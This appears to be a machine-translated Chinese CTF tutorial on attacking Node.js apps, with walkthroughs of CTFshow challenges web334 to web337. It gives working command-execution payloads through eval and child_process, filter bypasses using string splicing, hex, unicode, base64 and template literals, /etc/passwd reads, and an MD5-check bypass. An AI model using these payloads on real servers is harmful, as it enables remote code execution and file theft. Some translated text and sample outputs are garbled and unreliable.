当前位置：网站首页>Nodejs CTF Foundation

about toUpperCase(): character "ı"、"ſ" after toUpperCase After treatment, the result is "I"、"S"
about toLowerCase(): character "K" after toLowerCase After treatment, the result is "k"( This K No K)

Weak type comparison

Size comparison ：

console.log(1=='1'); //true 
console.log(1>'2'); //false 
console.log('1'<'2'); //true 
console.log(111>'3'); //true 
console.log('111'>'3'); //false 
console.log('asd'>1); //false

summary ： When comparing a number with a string , Will preferentially convert a pure numeric string to a number before comparison ; When comparing strings with strings , The first character of the string is converted to ASCII Code and then compare , Therefore, the fifth line of code will appear ; A non numeric string is compared to any number false

Array comparison ：

console.log([]==[]); //false 
console.log([]>[]); //false
console.log([6,2]>[5]); //true 
console.log([100,2]<'test'); //true 
console.log([1,2]<'2');  //true 
console.log([11,16]<"10"); //false

summary ： The comparison between empty arrays is always false, Comparison between arrays only compares the first value between arrays , For the first value, use the comparison method summarized above , Array and non numeric string comparison , Array is always smaller than non numeric string ; Array and numeric string comparison , Take the first one and compare it according to the method summarized above

There are also some special equivalents ：

console.log(null==undefined) //  Output ：true 
console.log(null===undefined) //  Output ：false 
console.log(NaN==NaN)  //  Output ：false 
console.log(NaN===NaN)  //  Output ：false

Variable splicing ：

console.log(5+[6,6]); //56,3 
console.log("5"+6); //56 
console.log("5"+[6,6]); //56,6 
console.log("5"+["6","6"]); //56,6

MD5 Bypass of

a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)

a[x]=1&b[x]=2

The array will be parsed into [object Object]

a={'x':'1'}
b={'x':'2'}

console.log(a+"flag{xxx}")
console.log(b+"flag{xxx}")

a=[1]
b=[2]

console.log(a+"flag{xxx}")
console.log(b+"flag{xxx}")

Code bypass

16 Hexadecimal code

console.log("a"==="\x61"); // true

unicode code

console.log("\u0061"==="a"); // true

base code

eval(Buffer.from('Y29uc29sZS5sb2coImhhaGFoYWhhIik7','base64').toString())

nodejs Use of hazard function

Command execution

exec()

require('child_process').exec('open /System/Applications/Calculator.app');

eval()

console.log(eval("document.cookie")); // perform document.cookie
console.log("document.cookie"); // Output document.cookie

File read and write

read

readFile()

require('fs').readFile('/etc/passwd', 'utf-8', (err, data) => {
 if (err) throw err;
 console.log(data);
});

readFileSync()

require('fs').readFileSync('/etc/passwd','utf-8')

Write

writeFileSync()

require('fs').writeFileSync('input.txt','sss');

writeFile()

require('fs').writeFile('input.txt','test',(err)=>{})

nodejs Danger function -RCE bypass

bypass

Prototype ：

require("child_process").execSync('cat flag.txt')

Character splicing ：

require("child_process")['exe'%2b'cSync']('cat flag.txt')
//(%2b Namely + Of url code )

require('child_process')["exe".concat("cSync")]("open /System/Applications/Calculator.app/")

Code bypass ：

require("child_process")["\x65\x78\x65\x63\x53\x79\x6e\x63"]('cat flag.txt')
require("child_process")["\u0065\u0078\u0065\u0063\u0053\x79\x6e\x63"]('cat fl001g.txt')
eval(Buffer.from('cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCdvcGVuIC9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwLycpOw==','base64').toString()) // Bomb calculator

Template splicing ：

require("child_process")[`${`${`exe`}cSync`}`]('open /System/Applications/Calculator.app/'）

Other functions ：

require("child_process").exec("sleep 3"); 
require("child_process").execSync("sleep 3"); 
require("child_process").execFile("/bin/sleep",["3"]); *// Call an executable , Pass in the second parameter args* 
require("child_process").spawn('sleep', ['3']); 
require("child_process").spawnSync('sleep', ['3']); 
require("child_process").execFileSync('sleep', ['3']);

CTFshow Example

web334

user.js

We input name Not for CTFSHOW then name The converted capital is CTFSHOW , The password for 123456 that will do .

The case feature is used

about toUpperCase(): character "ı"、"ſ" after toUpperCase After treatment, the result is "I"、"S"

that username=ctfſhow , password=123456 that will do

web335

There are hints in the source code ?eval

Should carry out eval() function , It can be executed js Code , Then you can execute system commands

Collect nodejs The order of payload

require('child_process').spawnSync('ls',['.']).stdout.toString()
require('child_process').spawnSync('cat',['fl00g.txt']).stdout.toString()

require('child_process').execSync('cat fl*').toString()

global.process.mainModule.constructor._load('child_process').execSync('cat fl*').toString()

web336

Is still get Pass on eval

Different. The last question is , Out-of-service execSync 了

use spawnSync Sure , But you can't read it with wildcards

?eval=require('child_process').spawnSync('ls',['.']).stdout.toString()
?eval=require('child_process').spawnSync('cat',['fl001g.txt']).stdout.toString()

web337

var express = require('express');
var router = express.Router();
var crypto = require('crypto');

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }
  
});

module.exports = router;

As mentioned above md5 Bypass

  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);

payload:

?a[x]=1&b[x]=2

原网站

版权声明
本文为[ThnPkm]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/205/202207241110530548.html